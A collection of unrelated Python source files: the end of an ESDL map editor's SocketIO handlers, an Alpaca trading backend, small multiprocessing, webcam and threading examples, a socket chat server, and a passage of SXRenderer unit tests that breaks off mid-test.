if 'carrier_colors' in me_ui_setting:
return me_ui_setting['carrier_colors']
return None
@socketio.on('initialize', namespace='/esdl')
def browser_initialize():
user_email = get_session('user-email')
role = get_session('user-role')
view_modes = ViewModes.get_instance()
view_modes.initialize_user(user_email)
me_settings = MapEditorSettings.get_instance()
user_settings = me_settings.get_user_settings(user_email)
set_session('user_settings', user_settings)
logger.info('Send initial information to client')
emit('user_settings', user_settings)
emit('control_strategy_config', esdl_config.esdl_config['control_strategies'])
emit('carrier_color_dict', get_carrier_color_dict())
emit('wms_layer_list', wms_layers.get_layers())
emit('cap_pot_list', ESDLAsset.get_objects_list())
emit('qau_information', get_qau_information())
emit('esdl_services', esdl_services.get_user_services_list(user_email, role))
emit('user_info', {'email': user_email})
initialize_app()
# ---------------------------------------------------------------------------------------------------------------------
# Disconnect
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('disconnect', namespace='/esdl')
def on_disconnect():
logger.info('Client disconnected: {}'.format(request.sid))
# ---------------------------------------------------------------------------------------------------------------------
# Error logging
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on_error_default
def default_error_handler(e):
logger.error('Error in SocketIO handler: '+str(e))
import traceback
logger.error('Socket IO message: {}'.format(request.event["message"])) # "my error event"
logger.error('Socket IO arguments: {}'.format(request.event["args"]))
traceback.print_exc()
# ---------------------------------------------------------------------------------------------------------------------
# Start application
# ---------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
parse_esdl_config()
logger.info("Starting ESDL MapEditor application")
user_actions_logging.store_logging("System", "application start", "", "", "", {})
socketio.run(app, debug=settings.FLASK_DEBUG, host=settings.FLASK_SERVER_HOST, port=settings.FLASK_SERVER_PORT, use_reloader=True)
|
alpaca.py
|
#
# Copyright 2018 Alpaca
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import alpaca_trade_api as tradeapi
from alpaca_trade_api.rest import APIError
from alpaca_trade_api.entity import Order
from requests.exceptions import HTTPError
import numpy as np
import pandas as pd
from trading_calendars import (
get_calendar,
register_calendar_alias,
)
from trading_calendars.calendar_utils import (
global_calendar_dispatcher as default_calendar,
)
from datetime import timedelta
import uuid
from .base import BaseBackend
from pylivetrader.api import symbol as symbol_lookup
from pylivetrader.misc.api_context import set_context
import pylivetrader.protocol as zp
from pylivetrader.finance.order import (
Order as ZPOrder,
ORDER_STATUS as ZP_ORDER_STATUS,
)
from pylivetrader.finance.execution import (
MarketOrder,
LimitOrder,
StopOrder,
StopLimitOrder,
)
from pylivetrader.misc.pd_utils import normalize_date
from pylivetrader.misc.parallel_utils import parallelize
from pylivetrader.errors import SymbolNotFound
from pylivetrader.assets import Equity
from logbook import Logger
from threading import Thread
import asyncio
log = Logger('Alpaca')
NY = 'America/New_York'
end_offset = pd.Timedelta('1000 days')
one_day_offset = pd.Timedelta('1 day')
def skip_http_error(statuses):
'''
A decorator to wrap with try..except to swallow
specific HTTP errors.
@skip_http_error((404, 503))
def fetch():
...
'''
assert isinstance(statuses, tuple)
def decorator(func):
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except HTTPError as e:
status_code = e.response.status_code
if status_code in statuses:
log.warn(str(e))
else:
raise
return wrapper
return decorator
class Backend(BaseBackend):
def __init__(
self,
key_id=None,
secret=None,
base_url=None,
api_version='v2'
):
self._key_id = key_id
self._secret = secret
self._base_url = base_url
self._api = tradeapi.REST(
key_id, secret, base_url, api_version=api_version
)
self._cal = get_calendar('NYSE')
self._open_orders = {}
self._orders_pending_submission = {}
def initialize_data(self, context):
# Open a websocket stream to get updates in real time
stream_process = Thread(
target=self._get_stream, daemon=True, args=(context,)
)
stream_process.start()
# Load all open orders
existing_orders = self.all_orders(status='open', initialize=True)
for k, v in existing_orders.items():
if self._open_orders.get(k) is not None:
self._open_orders[k] += v
else:
self._open_orders[k] = v
def _get_stream(self, context):
set_context(context)
asyncio.set_event_loop(asyncio.new_event_loop())
conn = tradeapi.StreamConn(self._key_id, self._secret, self._base_url)
channels = ['trade_updates']
@conn.on(r'trade_updates')
async def handle_trade_update(conn, channel, data):
# Check for any pending orders
waiting_order = self._orders_pending_submission.get(
data.order['client_order_id']
)
if waiting_order is not None:
if data.event == 'fill':
# Submit the waiting order
self.order(*waiting_order)
self._orders_pending_submission.pop(
data.order['client_order_id'], None
)
elif data.event in ['canceled', 'rejected']:
# Remove the waiting order
self._orders_pending_submission.pop(
data.order['client_order_id'], None
)
if data.event in ['canceled', 'rejected', 'fill']:
self._open_orders.pop(data.order['client_order_id'], None)
else:
self._open_orders[data.order['client_order_id']] = (
self._order2zp(Order(data.order))
)
conn.run(channels)
def _symbols2assets(self, symbols):
'''
Utility for debug/testing
'''
assets = {a.symbol: a for a in self.get_equities()}
return [assets[symbol] for symbol in symbols if symbol in assets]
def get_equities(self):
assets = []
t = normalize_date(pd.Timestamp('now', tz=NY))
raw_assets = self._api.list_assets(asset_class='us_equity')
for raw_asset in raw_assets:
asset = Equity(
raw_asset.id, raw_asset.exchange,
symbol=raw_asset.symbol,
asset_name=raw_asset.symbol,
)
asset.start_date = t - one_day_offset
if raw_asset.status == 'active' and raw_asset.tradable:
asset.end_date = t + end_offset
else:
# if asset is not tradable, set end_date = day before
asset.end_date = t - one_day_offset
asset.auto_close_date = asset.end_date
assets.append(asset)
# register all unseen exchange name as
# alias of NYSE (e.g. AMEX, ARCA, NYSEARCA.)
if not default_calendar.has_calendar(raw_asset.exchange):
register_calendar_alias(raw_asset.exchange,
'NYSE', force=True)
return assets
@property
def positions(self):
z_positions = zp.Positions()
positions = self._api.list_positions()
position_map = {}
symbols = []
for pos in positions:
symbol = pos.symbol
try:
z_position = zp.Position(symbol_lookup(symbol))
except SymbolNotFound:
continue
z_position.amount = int(pos.qty)
z_position.cost_basis = float(pos.cost_basis) / float(pos.qty)
z_position.last_sale_price = None
z_position.last_sale_date = None
z_positions[symbol_lookup(symbol)] = z_position
symbols.append(symbol)
position_map[symbol] = z_position
trades = self._symbol_trades(symbols)
for symbol, trade in trades.items():
z_position = position_map[symbol]
if trade is None:
z_position.last_sale_price = np.nan
z_position.last_sale_date = pd.NaT
else:
z_position.last_sale_price = float(trade.price)
z_position.last_sale_date = trade.timestamp
return z_positions
@property
def portfolio(self):
account = self._api.get_account()
z_portfolio = zp.Portfolio()
z_portfolio.cash = float(account.cash)
z_portfolio.positions = self.positions
z_portfolio.positions_value = float(
account.portfolio_value) - float(account.cash)
z_portfolio.portfolio_value = float(account.portfolio_value)
return z_portfolio
@property
def account(self):
account = self._api.get_account()
z_account = zp.Account()
z_account.buying_power = float(account.buying_power)
z_account.total_position_value = float(
account.portfolio_value) - float(account.cash)
return z_account
def _order2zp(self, order):
zp_order = ZPOrder(
id=order.client_order_id,
asset=symbol_lookup(order.symbol),
amount=int(order.qty) if order.side == 'buy' else -int(order.qty),
stop=float(order.stop_price) if order.stop_price else None,
limit=float(order.limit_price) if order.limit_price else None,
dt=order.submitted_at,
commission=0,
)
zp_order._status = ZP_ORDER_STATUS.OPEN
if order.canceled_at:
zp_order._status = ZP_ORDER_STATUS.CANCELLED
if order.failed_at:
zp_order._status = ZP_ORDER_STATUS.REJECTED
if order.filled_at:
zp_order._status = ZP_ORDER_STATUS.FILLED
zp_order.filled = int(order.filled_qty)
return zp_order
def _new_order_id(self):
return uuid.uuid4().hex
def batch_order(self, args):
return [self.order(*order) for order in args]
def order(self, asset, amount, style, quantopian_compatible=True):
symbol = asset.symbol
zp_order_id = self._new_order_id()
if quantopian_compatible:
current_position = self.positions[asset]
if (
abs(amount) > abs(current_position.amount) and
amount * current_position.amount < 0
):
# The order would take us from a long position to a short
# position or vice versa and needs to be broken up
self._orders_pending_submission[zp_order_id] = (
asset,
amount + current_position.amount,
style
)
amount = -1 * current_position.amount
qty = amount if amount > 0 else -amount
side = 'buy' if amount > 0 else 'sell'
order_type = 'market'
if isinstance(style, MarketOrder):
order_type = 'market'
elif isinstance(style, LimitOrder):
order_type = 'limit'
elif isinstance(style, StopOrder):
order_type = 'stop'
elif isinstance(style, StopLimitOrder):
order_type = 'stop_limit'
limit_price = style.get_limit_price(side == 'buy') or None
stop_price = style.get_stop_price(side == 'buy') or None
log.debug(
('submitting {} order for {} - '
'qty:{}, side:{}, limit_price:{}, stop_price:{}').format(
order_type,
symbol,
qty,
side,
limit_price,
stop_price
)
)
try:
order = self._api.submit_order(
symbol=symbol,
qty=qty,
side=side,
type=order_type,
time_in_force='day',
limit_price=limit_price,
stop_price=stop_price,
client_order_id=zp_order_id,
)
zp_order = self._order2zp(order)
self._open_orders[zp_order_id] = zp_order
return zp_order
except APIError as e:
log.warning('order for symbol {} is rejected {}'.format(
symbol,
e
))
return None
@property
def orders(self):
return {
o.client_order_id: self._order2zp(o)
for o in self._api.list_orders('all')
}
def get_order(self, zp_order_id):
order = None
try:
order = self._open_orders[zp_order_id]
except Exception:
# Order was not found in our open order list, may be closed
order = self._order2zp(
self._api.get_order_by_client_order_id(zp_order_id))
return order
def all_orders(
self,
before=None,
status='all',
days_back=None,
initialize=False):
# Check if the open order list is being asked for
if (not initialize and status == 'open'
and before is None and days_back is None):
return self._open_orders
# Get all orders submitted days_back days before `before` or now.
now = pd.Timestamp.utcnow()
start = now.isoformat() if before is None else before.isoformat()
# A session label refers to the market date that an order submitted
# at a given minute would be executed on. We'll need to keep track of
# this if the function is bounded by days_back.
start_session_label = self._cal.minute_to_session_label(now)
reached_end_date = False
all_orders = {}
batch_size = 500
orders = self._api.list_orders(status, batch_size, until=start)
while len(orders) > 0 and not reached_end_date:
batch_orders = {}
for order in orders:
if days_back is not None:
# Verify that the order is not too old.
# `session_distance()` ignores holidays and weekends.
days_since_order = self._cal.session_distance(
self._cal.minute_to_session_label(order.submitted_at),
start_session_label
)
if days_since_order > days_back:
reached_end_date = True
break
batch_orders[order.client_order_id] = self._order2zp(order)
all_orders.update(batch_orders)
if not reached_end_date:
# Get the timestamp of the earliest order in the batch.
until = pd.Timestamp(orders[-1].submitted_at).isoformat()
orders = self._api.list_orders(status, batch_size, until=until)
return all_orders
def cancel_order(self, zp_order_id):
try:
order = self._api.get_order_by_client_order_id(zp_order_id)
self._api.cancel_order(order.id)
except Exception as e:
print('Error: Could not cancel order {}'.format(zp_order_id))
log.error(e)
return
def get_last_traded_dt(self, asset):
trade = self._api.polygon.last_trade(asset.symbol)
return trade.timestamp
def get_spot_value(
self,
assets,
field,
dt,
date_frequency,
quantopian_compatible=True):
assert(field in (
'open', 'high', 'low', 'close', 'volume', 'price', 'last_traded'))
assets_is_scalar = not isinstance(assets, (list, set, tuple))
if assets_is_scalar:
symbols = [assets.symbol]
else:
symbols = [asset.symbol for asset in assets]
if field == 'last_traded' or \
not quantopian_compatible and field == 'price':
results = self._get_spot_trade(symbols, field)
else:
results = self._get_spot_bars(symbols, field)
return results[0] if assets_is_scalar else results
def _get_spot_trade(self, symbols, field):
assert(field in ('price', 'last_traded'))
symbol_trades = self._symbol_trades(symbols)
def get_for_symbol(symbol_trades, symbol):
trade = symbol_trades.get(symbol)
if field == 'price':
if trade is None:
return np.nan
return trade.price
else:
if trade is None:
return pd.NaT
return trade.timestamp
return [get_for_symbol(symbol_trades, symbol) for symbol in symbols]
def _get_spot_bars(self, symbols, field):
symbol_bars = self._symbol_bars(symbols, 'minute', limit=1)
def get_for_symbol(symbol_bars, symbol, field):
bars = symbol_bars.get(symbol)
if bars is None or len(bars) == 0:
return np.nan
return bars[field].values[-1]
ohlcv_field = 'close' if field == 'price' else field
results = [
get_for_symbol(symbol_bars, symbol, ohlcv_field)
for symbol in symbols
]
return results
def get_bars(self, assets, data_frequency, bar_count=500):
'''
Interface method.
Return: pd.Dataframe() with columns MultiIndex [asset -> OHLCV]
'''
assets_is_scalar = not isinstance(assets, (list, set, tuple))
is_daily = 'd' in data_frequency # 'daily' or '1d'
if assets_is_scalar:
symbols = [assets.symbol]
else:
symbols = [asset.symbol for asset in assets]
symbol_bars = self._symbol_bars(
symbols, 'day' if is_daily else 'minute', limit=bar_count)
if is_daily:
intra_bars = {}
symbol_bars_minute = self._symbol_bars(
symbols, 'minute', limit=1000)
for symbol, df in symbol_bars_minute.items():
agged = df.resample('1D').agg(dict(
open='first',
high='max',
low='min',
close='last',
volume='sum',
)).dropna()
intra_bars[symbol] = agged
dfs = []
for asset in assets if not assets_is_scalar else [assets]:
symbol = asset.symbol
df = symbol_bars.get(symbol)
if df is None:
dfs.append(pd.DataFrame(
[], columns=[
'open', 'high', 'low', 'close', 'volume']
))
continue
if is_daily:
agged = intra_bars.get(symbol)
if agged is not None and len(
agged.index) > 0 and agged.index[-1] not in df.index:
if not (agged.index[-1] > df.index[-1]):
log.warn(
('agged.index[-1] = {}, df.index[-1] = {} '
'for {}').format(
agged.index[-1], df.index[-1], symbol))
df = df.append(agged.iloc[-1])
df.columns = pd.MultiIndex.from_product([[asset, ], df.columns])
dfs.append(df)
return pd.concat(dfs, axis=1)
def _symbol_bars(
self,
symbols,
size,
_from=None,
to=None,
limit=None):
'''
Query historic_agg either minute or day in parallel
for multiple symbols, and return in dict.
symbols: list[str]
size: str ('day', 'minute')
_from: str or pd.Timestamp
to: str or pd.Timestamp
limit: str or int
return: dict[str -> pd.DataFrame]
'''
assert size in ('day', 'minute')
if not (_from or to):
to = pd.to_datetime('now', utc=True).tz_convert('America/New_York')
if not (_from and to) and limit:
# temp workaround for less bars after masking by
# market hours
query_limit = limit
if query_limit is not None:
query_limit *= 2
if _from:
if size == 'day':
to = _from + timedelta(days=query_limit+1)
else:
to = _from + timedelta(minutes=query_limit+1)
else:
if size == 'day':
_from = to - timedelta(days=query_limit+1)
else:
_from = to - timedelta(minutes=query_limit+1)
@skip_http_error((404, 504))
def fetch(symbol):
df = self._api.polygon.historic_agg_v2(
symbol, 1, size,
int(_from.timestamp()) * 1000,
int(to.timestamp()) * 1000
).df
# rename Polygon's v2 agg fields to match their full titles
df = df.rename(index=str, columns={
't': 'timestamp',
'o': 'open',
'h': 'high',
'l': 'low',
'c': 'close',
'v': 'volume'
})
# convert timestamps to datetimes
# astype is necessary to deal with empty result
df.index = pd.to_datetime(
df.index.astype('str'),
utc=True,
).tz_convert('America/New_York')
df.index.name = 'timestamp'
# zipline -> right label
# API result -> left label (beginning of bucket)
if size == 'minute':
df.index += pd.Timedelta('1min')
if not df.empty:
# mask out bars outside market hours
mask = self._cal.minutes_in_range(
df.index[0], df.index[-1],
).tz_convert(NY)
df = df.reindex(mask)
if limit is not None:
df = df.iloc[-limit:]
return df
return parallelize(fetch)(symbols)
def _symbol_trades(self, symbols):
'''
Query last_trade in parallel for multiple symbols and
return in dict.
symbols: list[str]
return: dict[str -> polygon.Trade]
'''
@skip_http_error((404, 504))
def fetch(symbol):
return self._api.polygon.last_trade(symbol)
return parallelize(fetch)(symbols)
|
ex2_lock.py
|
import multiprocessing
# python -m timeit -s "import ex2_lock" "ex2_lock.run_workers()"
# 19ms using lock.acquire
# 21ms using with.lock
def work(value, max_count, lock):
for n in range(max_count):
with lock:
value.value += 1
#lock.acquire()
#value.value += 1
#lock.release()
def run_workers():
NBR_PROCESSES = 4
MAX_COUNT_PER_PROCESS = 1000
total_expected_count = NBR_PROCESSES * MAX_COUNT_PER_PROCESS
processes = []
lock = multiprocessing.Lock()
value = multiprocessing.Value('i', 0)
for process_nbr in range(NBR_PROCESSES):
p = multiprocessing.Process(target=work, args=(value, MAX_COUNT_PER_PROCESS, lock))
p.start()
processes.append(p)
# wait for the processes to finish
for p in processes:
p.join()
# print the final value
print("Expecting to see a count of {}".format(total_expected_count))
print("We have counted to {}".format(value.value))
if __name__ == "__main__":
run_workers()
|
webcam.py
|
import numpy as np
import cv2
import time
from multiprocessing import Process, Queue, Value
class Webcam(object):
def __init__(self, camera_num=0):
self.cap = cv2.VideoCapture(camera_num)
self.current_frame = None
self.ret = None
self.is_running = Value('i',1)
self.q = Queue(maxsize=2)
self.vp = Process(target=self._update_frame, args=(self.q,self.is_running,))
self.vp.daemon = True
# create thread for capturing images
def start(self):
self.vp.start()
def quit(self):
print('webcam closing...')
self.is_running.value = 0
self.vp.join(timeout=5)
# process function
def _update_frame(self, q, is_running):
while is_running.value == 1:
self.ret, self.current_frame = self.cap.read()
if self.ret is True:
#self.current_frame= self.cap.read()[1]
if q.full():
old_frame = self.q.get()
self.q.put(self.current_frame)
print('q.size: ', self.q.qsize())
time.sleep(0.005)
# get the current frame
def get_current_frame(self):
img = None
while not self.q.empty(): # get last available image
img = self.q.get()
return img
|
docxtractor_threads.py
|
import os
import docxtractor as dxtr
import Models.ImportModel as IM
import threading
import math
import sys
import subprocess
import datetime
def call_exe(start_index, end_index):
command = "python " + os.getcwd() + "\docxtractor_thread_exe.py " + str(start_index) + " " + str(end_index)
print([command])
x = subprocess.run(command, capture_output=True)
print(x)
def main():
# import spreadsheet object of researcher data
#org_sheet = IM.scrape6()
start_time = datetime.datetime.now()
print("start time:", start_time)
start_num = 25001
end_num = 27229
per_thread = 500
num_threads = 7
max_thread_count = math.ceil((end_num - start_num + 1) / per_thread)
if num_threads > max_thread_count:
num_threads = max_thread_count
print("WE SET THE MAX NUM THREADS TO", num_threads)
# split into 50 threads
# then we run the threads
threads = []
for i in range(0, max_thread_count):
start_index = (start_num - 1) + per_thread * i
end_index = (start_num - 1) + per_thread * (i+1)
if i == (max_thread_count - 1):
end_index = end_num
t = threading.Thread(target=call_exe, args=(start_index, end_index))
t.daemon = True
threads.append(t)
start_thread = 0
while True:
end_thread = start_thread + num_threads
if end_thread >= max_thread_count:
end_thread = max_thread_count
for t in threads[start_thread:end_thread]:
t.start()
for t in threads[start_thread:end_thread]:
t.join()
start_thread = start_thread + num_threads
if end_thread == max_thread_count:
break
end_time = datetime.datetime.now()
diff = end_time-start_time
minutes = diff.total_seconds() / 60
seconds = diff.total_seconds() % 60
print("start_time:", start_time)
print("end time:", end_time)
print(f"time taken: {math.floor(minutes)} minutes and {math.floor(seconds)} seconds." )
if __name__ == "__main__":
main()
|
server.py
|
import socket
from threading import Thread
#server's ip address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5002 #port we want to use
separator_token = "<SEP>" #we will use this to seperate client name &message
#initialize set/list of all connected client's sockets
client_sockets = set()
#create a TCP socket
s = socket.socket()
#make the port as reusable
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#bind the socket to the address we specified
s.bind((SERVER_HOST, SERVER_PORT))
#listen for upcoming connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
def listen_for_client(cs):
"""
This function keep listening for a message from 'cs' socket whenever a message is received,broadcast it to all
other connected clients
"""
while True:
try:
#keep listening for a message from 'cs' socket
msg = cs.recv(1024).decode()
except Exception as e:
#client no longer connected
#remove it from the set
print(f"[!] Error: {e}")
client_sockets.remove(cs)
else:
#if we received a message, replace the <SEP>
#token with ": " for nice printing
msg = msg.replace(separator_token, ": ")
#iterate over all connected sockets
for client_socket in client_sockets:
#and send the message
client_socket.send(msg.encode())
while True:
#we keep listening for new connections all the time
client_socket, client_address = s.accept()
print(f"[+] {client_address} connected.")
#add the new connected client to connected sockets
client_sockets.add(client_socket)
#start a new thread that listens for each client's messages
t = Thread(target=listen_for_client, args=(client_socket,))
#make the thread daemon so it ends whenever the main thread ends
t.daemon = True
#start the thread
t.start()
#close client sockets
for cs in client_sockets:
cs.close()
#close server socket
s.close
|
SXRendererTest.py
|
##########################################################################
#
# Copyright (c) 2011, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import os
import sys
import threading
import IECore
import IECoreRI
class SXRendererTest( unittest.TestCase ) :
def __loadImage( self, fileName ) :
i = IECore.Reader.create( fileName ).read()
r = i["R"].data
g = i["G"].data
b = i["B"].data
result = IECore.V3fVectorData()
v = IECore.V3f
for i in range( 0, len( r ) ) :
result.append( v( r[i], g[i], b[i] ) )
return result
def __saveImage( self, data, dataWindow, fileName ) :
image = IECore.ImagePrimitive( dataWindow, dataWindow )
if isinstance( data, IECore.FloatVectorData ) :
image["R"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, data )
image["G"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, data )
image["B"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, data )
else :
r = IECore.FloatVectorData()
g = IECore.FloatVectorData()
b = IECore.FloatVectorData()
for c in data :
r.append( c[0] )
g.append( c[1] )
b.append( c[2] )
image["R"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, r )
image["G"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, g )
image["B"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, b )
IECore.Writer.create( image, fileName ).write()
def __rectanglePoints( self, box ) :
p = IECore.V3fVectorData()
n = IECore.V3fVectorData()
i = IECore.V3fVectorData()
dPdu = IECore.V3fVectorData()
dPdv = IECore.V3fVectorData()
s = IECore.FloatVectorData()
t = IECore.FloatVectorData()
for y in range( box.min.y, box.max.y + 1 ) :
for x in range( box.min.x, box.max.x + 1 ) :
p.append( IECore.V3f( x, y, 0 ) )
n.append( IECore.V3f( 0, 0, 1 ) )
i.append( IECore.V3f( 0, 0, -1 ) )
dPdu.append( IECore.V3f( 2, 0, 0 ) )
dPdv.append( IECore.V3f( 0, 2, 0 ) )
s.append( float( x ) / box.size().x )
t.append( float( y ) / box.size().y )
return IECore.CompoundData( {
"P" : p,
"N" : n,
"Ng" : n,
"I" : i,
"dPdu" : dPdu,
"dPdv" : dPdv,
"s" : s,
"t" : t,
} )
def __assertVectorDataAlmostEqual( self, data1, data2 ) :
self.assertEqual( len( data1 ), len( data2 ) )
self.assertEqual( data1.typeName(), data2.typeName() )
if isinstance( data1, IECore.Color3fVectorData ) :
for i in range( 0, len( data1 ) ) :
self.failUnless( data1[i].equalWithAbsError( data2[i], 0.000001 ) )
else :
for i in range( 0, len( data1 ) ) :
self.assertAlmostEqual( data1[i], data2[i], 6 )
def test( self ) :
r = IECoreRI.SXRenderer()
points = IECore.CompoundData( {
"N" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"Ng" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"P" : self.__loadImage( "test/IECoreRI/data/sxInput/cowP.exr" ),
"I" : self.__loadImage( "test/IECoreRI/data/sxInput/cowI.exr" ),
} )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxTest.sdl test/IECoreRI/shaders/sxTest.sl" ), 0 )
r.shader( "surface", "test/IECoreRI/shaders/sxTest.sdl", { "noiseFrequency" : 1.0, "tint" : IECore.Color3f( 1 ) } )
s = r.shade( points )
self.assertEqual( len( s ), 6 )
self.failUnless( "outputFloat" in s )
self.failUnless( "outputColor" in s )
self.failUnless( "Ci" in s )
self.failUnless( "Oi" in s )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
self.__assertVectorDataAlmostEqual( s["outputFloat"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowFloat.cob" ).read() )
self.__assertVectorDataAlmostEqual( s["outputColor"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowColor.cob" ).read() )
self.__assertVectorDataAlmostEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowCI.cob" ).read() )
self.__assertVectorDataAlmostEqual( s["Oi"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowOI.cob" ).read() )
def testSplineParameter( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {
"spl" : IECore.SplinefColor3fData(
IECore.SplinefColor3f(
IECore.CubicBasisf.catmullRom(),
(
( 0, IECore.Color3f( 1, 0, 0 ) ),
( 0, IECore.Color3f( 1, 0, 0 ) ),
( 1, IECore.Color3f( 0, 0, 1 ) ),
( 1, IECore.Color3f( 0, 0, 1 ) ),
)
)
)
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.__assertVectorDataAlmostEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/spline.cob" ).read() )
# make sure that users don't have to provide values for every varying shader parameter if
# they don't want to. this used to crash.
def testMissingPredefinedVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
del points["t"] # remove information the shader requires
s = r.shade( points )
def testParameterTypes( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : 1.0,
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
"mustBeOneTwoThree" : IECore.V3f( 1, 2, 3 ),
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 1 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.assertEqual( s["Ci"][0], IECore.Color3f( 0, 1, 0 ) )
def testFloat3PrimitiveVariable( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : 1.0,
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) )
points = self.__rectanglePoints( b )
points["mustBeOneTwoThree"] = IECore.V3fVectorData( [ IECore.V3f( 1, 2, 3 ) ] * len( points["P"] ) )
s = r.shade( points )
for c in s["Ci"] :
self.assertEqual( c, IECore.Color3f( 0, 1, 0 ) )
def testIntParameterSupport( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : IECore.IntData( 1 ),
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
"mustBeOneTwoThree" : IECore.V3f( 1, 2, 3 ),
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 1 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.assertEqual( s["Ci"][0], IECore.Color3f( 0, 1, 0 ) )
def testBoolParameterSupport( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : IECore.BoolData( True ),
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
